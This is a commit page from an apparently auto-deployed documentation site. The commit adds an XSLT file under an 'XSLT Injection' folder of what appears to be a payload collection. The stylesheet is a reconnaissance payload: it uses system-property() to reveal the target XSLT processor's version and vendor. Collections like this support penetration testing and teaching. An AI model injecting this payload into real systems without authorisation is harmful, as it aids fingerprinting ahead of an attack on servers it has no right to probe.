Deployed 3ca2ece with MkDocs version: 1.6.1
This commit is contained in:
10
XSLT Injection/Files/system-properties.xsl
Normal file
10
XSLT Injection/Files/system-properties.xsl
Normal file
@@ -0,0 +1,10 @@
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
|
||||
<xsl:template match="/">
|
||||
<p>
|
||||
Version: <xsl:value-of select="system-property('xsl:version')" /> <br />
|
||||
Vendor: <xsl:value-of select="system-property('xsl:vendor')" /> <br />
|
||||
Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" />
|
||||
</p>
|
||||
</xsl:template>
|
||||
</xsl:stylesheet>
|
||||
Reference in New Issue
Block a user